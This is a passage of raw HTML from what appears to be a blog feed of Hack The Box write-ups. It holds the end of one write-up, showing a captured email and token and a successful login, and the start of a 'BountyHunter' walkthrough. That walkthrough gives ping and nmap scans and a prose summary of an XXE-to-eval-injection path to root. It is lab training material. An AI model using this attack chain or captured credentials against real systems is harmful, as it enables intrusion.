stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>And we got our key:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!uGy7!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9b52e7e7-9889-4cc0-87e2-5d84ea0e3015_1588x963.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!uGy7!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9b52e7e7-9889-4cc0-87e2-5d84ea0e3015_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!uGy7!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9b52e7e7-9889-4cc0-87e2-5d84ea0e3015_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!uGy7!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9b52e7e7-9889-4cc0-87e2-5d84ea0e3015_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!uGy7!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9b52e7e7-9889-4cc0-87e2-5d84ea0e3015_1588x963.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!uGy7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9b52e7e7-9889-4cc0-87e2-5d84ea0e3015_1588x963.png" width="1588" height="963" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9b52e7e7-9889-4cc0-87e2-5d84ea0e3015_1588x963.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:963,&quot;width&quot;:1588,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:154239,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192936305?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff5bd5826-1e9b-457f-bfc4-0da154f111eb_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!uGy7!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9b52e7e7-9889-4cc0-87e2-5d84ea0e3015_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!uGy7!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9b52e7e7-9889-4cc0-87e2-5d84ea0e3015_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!uGy7!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9b52e7e7-9889-4cc0-87e2-5d84ea0e3015_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!uGy7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9b52e7e7-9889-4cc0-87e2-5d84ea0e3015_1588x963.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">{
  "email": "ayam@gonuclear.com",
  "token": "150d6772-f8fa-45f6-8b78-ebb9d4ed7609"
}</code></pre></div><p>Done, success!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!s-eo!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7ef960d-10db-4bc0-a125-36cc107324d4_1588x963.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!s-eo!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7ef960d-10db-4bc0-a125-36cc107324d4_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!s-eo!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7ef960d-10db-4bc0-a125-36cc107324d4_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!s-eo!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7ef960d-10db-4bc0-a125-36cc107324d4_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!s-eo!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7ef960d-10db-4bc0-a125-36cc107324d4_1588x963.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!s-eo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7ef960d-10db-4bc0-a125-36cc107324d4_1588x963.png" width="1456" height="883" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b7ef960d-10db-4bc0-a125-36cc107324d4_1588x963.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:883,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:131813,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192936305?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7ef960d-10db-4bc0-a125-36cc107324d4_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!s-eo!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7ef960d-10db-4bc0-a125-36cc107324d4_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!s-eo!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7ef960d-10db-4bc0-a125-36cc107324d4_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!s-eo!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7ef960d-10db-4bc0-a125-36cc107324d4_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!s-eo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7ef960d-10db-4bc0-a125-36cc107324d4_1588x963.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0mJn!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2cc78e4-5c99-4af5-be03-fc741dc6b100_1588x963.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0mJn!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2cc78e4-5c99-4af5-be03-fc741dc6b100_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!0mJn!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2cc78e4-5c99-4af5-be03-fc741dc6b100_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!0mJn!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2cc78e4-5c99-4af5-be03-fc741dc6b100_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!0mJn!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2cc78e4-5c99-4af5-be03-fc741dc6b100_1588x963.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!0mJn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2cc78e4-5c99-4af5-be03-fc741dc6b100_1588x963.png" width="1456" height="883" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b2cc78e4-5c99-4af5-be03-fc741dc6b100_1588x963.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:883,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:156286,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192936305?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2cc78e4-5c99-4af5-be03-fc741dc6b100_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!0mJn!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2cc78e4-5c99-4af5-be03-fc741dc6b100_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!0mJn!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2cc78e4-5c99-4af5-be03-fc741dc6b100_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!0mJn!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2cc78e4-5c99-4af5-be03-fc741dc6b100_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!0mJn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2cc78e4-5c99-4af5-be03-fc741dc6b100_1588x963.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>And we logged on!</p><p>Happy Hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[HTB - BountyHunter Linux (Easy)]]></title><description><![CDATA[Discover Bug bounty platform vulnerable to XXE and encoding combination, leading to internal enumeration and found valid logon password. Elevate to root via abusing eval() on user-controlled input.]]></description><link>https://byt3n33dl3.substack.com/p/htb-bountyhunter-linux-easy</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/htb-bountyhunter-linux-easy</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Thu, 02 Apr 2026 08:13:59 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!BsQB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa66182c5-b809-425f-8772-70747326bd8b_935x532.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BsQB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa66182c5-b809-425f-8772-70747326bd8b_935x532.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BsQB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa66182c5-b809-425f-8772-70747326bd8b_935x532.png 424w, https://substackcdn.com/image/fetch/$s_!BsQB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa66182c5-b809-425f-8772-70747326bd8b_935x532.png 848w, https://substackcdn.com/image/fetch/$s_!BsQB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa66182c5-b809-425f-8772-70747326bd8b_935x532.png 1272w, https://substackcdn.com/image/fetch/$s_!BsQB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa66182c5-b809-425f-8772-70747326bd8b_935x532.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BsQB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa66182c5-b809-425f-8772-70747326bd8b_935x532.png" width="935" height="532" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a66182c5-b809-425f-8772-70747326bd8b_935x532.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:532,&quot;width&quot;:935,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:183001,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa66182c5-b809-425f-8772-70747326bd8b_935x532.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!BsQB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa66182c5-b809-425f-8772-70747326bd8b_935x532.png 424w, https://substackcdn.com/image/fetch/$s_!BsQB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa66182c5-b809-425f-8772-70747326bd8b_935x532.png 848w, https://substackcdn.com/image/fetch/$s_!BsQB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa66182c5-b809-425f-8772-70747326bd8b_935x532.png 1272w, https://substackcdn.com/image/fetch/$s_!BsQB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa66182c5-b809-425f-8772-70747326bd8b_935x532.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><em>From HTB: </em></p><p>BountyHunter is an easy Linux machine that uses XML external entity injection to read system files. Being able to read a PHP file where credentials are leaked gives the opportunity to get a foothold on system as development user. </p><p>A message from John mentions a contract with Skytrain Inc and states about a script that validates tickets. </p><p>Auditing the source code of the python script reveals that it uses the eval function on ticket code, which can be injected, and as the python script can be run as root with sudo by the development user it is possible to get a root shell.</p><ol><li><p><em>Network Enumeration and Port Discovery</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;7c83813b-1984-4c67-b732-1c7dc992101b&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ping -c2 10.129.95.166
PING 10.129.95.166 (10.129.95.166) 56(84) bytes of data.
64 bytes from 10.129.95.166: icmp_seq=1 ttl=63 time=259 ms
64 bytes from 10.129.95.166: icmp_seq=2 ttl=63 time=268 ms

--- 10.129.95.166 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 258.635/263.112/267.589/4.477 ms</code></pre></div><p>Continue with NMAP Scanning:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p- --min-rate 8000 10.129.95.166 -oA nmap/nmap
Starting Nmap 7.98 ( https://nmap.org ) at 
Nmap scan report for 10.129.95.166
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p22,80 -sC -sV 10.129.95.166 -oA nmap/nmap-ports
Starting Nmap 7.98 ( https://nmap.org ) at 
Nmap scan report for 10.129.95.166
Host is up (0.25s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Bounty Hunters
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><p>Welp, nothing else than to start with HTTP on port 80.</p><ol start="2"><li><p><em>HTTP Service Enumeration</em></p></li></ol><p>This is the UI:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!51H2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5721534e-0538-4fe8-8be0-e63bb621598d_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!51H2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5721534e-0538-4fe8-8be0-e63bb621598d_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!51H2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5721534e-0538-4fe8-8be0-e63bb621598d_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!51H2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5721534e-0538-4fe8-8be0-e63bb621598d_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!51H2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5721534e-0538-4fe8-8be0-e63bb621598d_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!51H2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5721534e-0538-4fe8-8be0-e63bb621598d_1590x965.png" width="1456" height="884" 